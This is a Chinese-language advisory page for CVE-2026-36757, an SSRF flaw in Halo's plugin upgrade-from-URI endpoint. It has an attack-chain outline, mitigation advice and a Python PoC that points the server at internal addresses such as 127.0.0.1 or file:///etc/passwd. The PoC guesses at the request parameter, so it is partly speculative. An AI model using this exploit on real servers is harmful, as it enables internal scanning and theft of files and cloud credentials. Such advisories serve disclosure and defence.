CVE-2026-36757 CVSS 4.3 中危

CVE-2026-36757 Halo存在服务端请求伪造漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36757

漏洞类型

SSRF (服务端请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Halo

漏洞概述

Halo v2.22.14版本的/plugins/{name}/upgrade-from-uri接口存在服务端请求伪造（SSRF）漏洞。由于该端点对用户提供的URI地址缺乏有效的过滤与校验，经过身份验证的攻击者可以通过发送特制的GET请求，诱导服务器向内网资源发起请求，从而探测内网端口或访问敏感信息。

技术细节

该漏洞产生于Halo的插件升级功能模块中。当服务器接收到对/plugins/{name}/upgrade-from-uri端点的请求时，会从请求参数中获取目标URI并尝试从该地址下载插件更新。由于代码未对该URI进行严格的内网IP地址限制（如未过滤127.0.0.1、10.0.0.0/8等网段），攻击者可利用此缺陷，将URL替换为内网地址（如本地文件服务或云元数据服务）。攻击者只需拥有低权限账号，即可利用服务器作为跳板，扫描内网开放端口、读取本地敏感文件或窃取云服务凭证，实现内网信息探测。

攻击链分析

STEP 1

1. 信息收集

攻击者对目标Halo系统进行侦察，确认版本信息及是否存在插件升级接口。

STEP 2

2. 获取凭证

攻击者注册或使用已有的低权限账号登录系统，获取有效的身份认证Token。

STEP 3

3. 构造 payload

攻击者构造包含内网地址（如127.0.0.1）的URI参数，准备发送至漏洞端点。

STEP 4

4. 发送恶意请求

攻击者向/plugins/{name}/upgrade-from-uri端点发送带有恶意的GET请求。

STEP 5

5. 内网扫描/信息泄露

服务器解析请求并向内网目标地址发起连接，攻击者根据响应时间或内容判断内网资产状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, plugin_name, internal_url, auth_token):
    """
    PoC for CVE-2026-36757
    Exploit SSRF in /plugins/{name}/upgrade-from-uri
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Construct the malicious URL based on the description
    # Assuming the URI is passed as a query parameter or path parameter depending on implementation
    # Here we simulate a request structure common in such endpoints
    exploit_endpoint = f"{target_url}/plugins/{plugin_name}/upgrade-from-uri"
    
    params = {
        "uri": internal_url  # e.g., http://127.0.0.1:22 or file:///etc/passwd
    }
    
    try:
        response = requests.get(exploit_endpoint, headers=headers, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to internal resource: {internal_url}")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

# Usage
# exploit_ssrf("http://example.com:8090", "vulnerable-plugin", "http://127.0.0.1:8080", "YOUR_LOW_PRIV_TOKEN")

影响范围

Halo v2.22.14

防御指南

临时缓解措施

在官方修复补丁发布前，建议管理员在防火墙层面限制服务器对外发起不必要的网络请求，或直接禁用插件通过URI升级的功能。同时，加强对后台管理系统的访问控制，确保攻击者无法获取低权限账号。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表